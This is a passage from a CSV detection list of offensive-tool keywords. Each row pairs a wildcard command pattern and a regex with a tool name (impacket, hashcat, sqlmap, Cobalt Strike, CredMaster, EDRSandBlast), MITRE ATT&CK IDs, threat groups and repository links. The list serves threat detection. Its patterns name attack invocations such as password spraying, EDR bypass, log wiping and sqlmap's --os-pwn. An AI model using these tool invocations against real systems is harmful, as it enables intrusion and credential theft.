Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -nthash * -spn * -domain-sid * -domain *",".{0,1000}\s\-nthash\s.{0,1000}\s\-spn\s.{0,1000}\s\-domain\-sid\s.{0,1000}\s\-domain\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 
-domain*",".{0,1000}\s\-nthash\s.{0,1000}\-domain\-sid\sS\-1\-5\-11\-39129514\-1145628974\-103568174\s\-domain.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* ntlm.py*",".{0,1000}\sntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* ntlm.wordlist *--hex-wordlist*",".{0,1000}\sntlm\.wordlist\s.{0,1000}\-\-hex\-wordlist.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* --ntlm-proxy-ip * --ntlm-proxy-port *",".{0,1000}\s\-\-ntlm\-proxy\-ip\s.{0,1000}\s\-\-ntlm\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "* ntlmrecon*",".{0,1000}\sntlmrecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "* NTLMv1 captured *",".{0,1000}\sNTLMv1\scaptured\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* ntlmv1.py*",".{0,1000}\sntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --nt-offsets *.csv*",".{0,1000}\s\-\-nt\-offsets\s.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "* ntp-info.nse*",".{0,1000}\sntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ntp-monlist.nse*",".{0,1000}\sntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nuages.formatImplantLastSeen*",".{0,1000}\snuages\.formatImplantLastSeen.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "* NuagesImplant*",".{0,1000}\sNuagesImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "* nullinux.py*",".{0,1000}\snullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "* -o /share/payloads/*",".{0,1000}\s\-o\s\/share\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* -o cowroot*",".{0,1000}\s\-o\scowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "* -o ffuf.csv*",".{0,1000}\s\-o\sffuf\.csv.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "* -o merlin.dll merlin.c *",".{0,1000}\s\-o\smerlin\.dll\smerlin\.c\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control 
(C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "* -o moonwalk*",".{0,1000}\s\-o\smoonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "* -o simpleXORencoder*",".{0,1000}\s\-o\ssimpleXORencoder.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* -o sliver-server*",".{0,1000}\s\-o\ssliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* -o sprayed.txt*",".{0,1000}\s\-o\ssprayed\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -o:badrat.xll *",".{0,1000}\s\-o\:badrat\.xll\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* -oA icebreaker-scan*",".{0,1000}\s\-oA\sicebreaker\-scan.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --obfuscate *",".{0,1000}\s\-\-obfuscate\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* Obfuscated-Code.py*",".{0,1000}\sObfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "* obfuscation.exe --help*",".{0,1000}\sobfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* octopus.py*",".{0,1000}\soctopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "* office2john.py*",".{0,1000}\soffice2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* OfficePersistence.ps1*",".{0,1000}\sOfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "* oh365userfinder.py*",".{0,1000}\soh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* -old-bloodhound*",".{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* 
omp2-brute.nse*",".{0,1000}\somp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omp2-enum-targets.nse*",".{0,1000}\somp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omron-info.nse*",".{0,1000}\somron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --oneliner-nothidden*",".{0,1000}\s\-\-oneliner\-nothidden.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* onesixtyone.c*",".{0,1000}\sonesixtyone\.c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* --only-abuse --dc-host *",".{0,1000}\s\-\-only\-abuse\s\-\-dc\-host\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --only-known-exploit-paths*",".{0,1000}\s\-\-only\-known\-exploit\-paths.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* openflow-info.nse*",".{0,1000}\sopenflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openlookup-info.nse*",".{0,1000}\sopenlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openvas-otp-brute.nse*",".{0,1000}\sopenvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openwebnet-discovery.nse*",".{0,1000}\sopenwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* options.fake_hostname*",".{0,1000}\soptions\.fake_hostname.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* oracle-brute.nse*",".{0,1000}\soracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-brute-stealth.nse*",".{0,1000}\soracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-enum-users.nse*",".{0,1000}\soracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-sid-brute.nse*",".{0,1000}\soracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-tns-version.nse*",".{0,1000}\soracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --os-bof*",".{0,1000}\s\-\-os\-bof.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --os-cmd whoami*",".{0,1000}\s\-\-os\-cmd\swhoami.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* 
--os-pwn*",".{0,1000}\s\-\-os\-pwn.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --os-smbrelay*",".{0,1000}\s\-\-os\-smbrelay.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* ouned_smbserver.py*",".{0,1000}\souned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --outdir ldapdomaindump *",".{0,1000}\s\-\-outdir\sldapdomaindump\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Out-Minidump.ps1*",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --outpath * --config *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --outpath *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* 